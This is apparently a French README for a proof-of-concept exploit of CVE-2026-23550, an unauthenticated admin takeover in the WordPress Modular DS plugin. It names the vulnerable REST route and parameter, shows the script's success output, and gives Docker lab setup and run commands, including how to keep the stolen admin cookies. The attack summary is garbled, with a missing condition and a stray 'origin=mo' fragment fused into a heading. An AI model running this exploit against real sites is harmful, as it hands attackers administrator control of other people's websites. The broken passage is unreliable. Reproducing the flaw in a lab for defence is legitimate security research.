
CVE-2026-23550 - Plugin WordPress Modular DS **Accès administrateur non authentifié**
Preuve de concept (PoC) démontrant CVE-2026-23550 - prise de contrôle critique du compte admin sans authentification dans le plugin WordPress Modular DS (versions ≤2.5.1). Exploité activement dans la nature.

Résumé de l'attaque : Le routage défectueux de l'API REST dans /api/modular-connector/login contourne l'authentification WordPress lorsque , accordant des cookies de session admin non authentifiés.
origin=mo# PoC prêt pour la production
./CVE-2026-23550-PoC.sh http://target.com
[+] CVE-2026-23550 Modular Connector Exploit Test
[+] VULNÉRABLE : Cookie de session admin émis
Le point de terminaison REST affecté est accessible exclusivement via le mécanisme ?rest_route= ; l'accès direct via /wp-json/ peut être indisponible. La vulnérabilité permet un accès non authentifié sans identifiants ni validation de nonce. L'émission réussie d'un cookie de session administrateur WordPress constitue une confirmation de l'exploitation. Cette preuve de concept n'exécute aucune action administrative. Modular DS version 2.5.0 est utilisé lors des tests.
mkdir -p ~/Desktop/CVE-2026-23550/cve-poc-wp
cd ~/Desktop/CVE-2026-23550/cve-poc-wp
version: "3.9"
services:
db:
image: mysql:8.0
restart: always
environment:
MYSQL_ROOT_PASSWORD: rootpass
MYSQL_DATABASE: wordpress
MYSQL_USER: wpuser
MYSQL_PASSWORD: wppass
volumes:
- db_data:/var/lib/mysql
wordpress:
image: wordpress:6.4.3-php8.2-apache
depends_on:
- db
ports:
- "8080:80"
restart: always
environment:
WORDPRESS_DB_HOST: db:3306
WORDPRESS_DB_USER: wpuser
WORDPRESS_DB_PASSWORD: wppass
WORDPRESS_DB_NAME: wordpress
volumes:
- wp_data:/var/www/html
volumes:
db_data:
wp_data:
docker compose up -d
docker compose logs -f db
Attendez : "ready for connections"
curl http://localhost:8080/?rest_route=/
Attendu :
{
"name": "...",
"namespaces": [...]
}
Si cela échoue → ARRÊTEZ, l'environnement est cassé.
wget https://downloads.wordpress.org/plugin/modular-connector.2.5.0.zip
unzip modular-connector.2.5.0.zip
WORDPRESS_ID=$(docker compose ps -q wordpress)
docker cp modular-connector "$WORDPRESS_ID":/var/www/html/wp-content/plugins/
docker exec "$WORDPRESS_ID" chown -R www-data:www-data \
/var/www/html/wp-content/plugins/modular-connector
chmod +x CVE-2026-23550-PoC.sh
./CVE-2026-23550-PoC.sh http://localhost:8080/
Remarque : Si vous voulez les cookies dans un fichier texte, supprimez "rm -f "$COOKIE_JAR"" du fichier poc.sh.
Licence MIT - Pour la recherche en sécurité et les tests d'intrusion autorisés uniquement. Pas pour un usage malveillant. Divulguer de manière responsable.
Ce PoC est destiné uniquement aux tests de sécurité autorisés. Toute utilisation non autorisée contre des systèmes de production est illégale. Signalez les découvertes aux mainteneurs du plugin.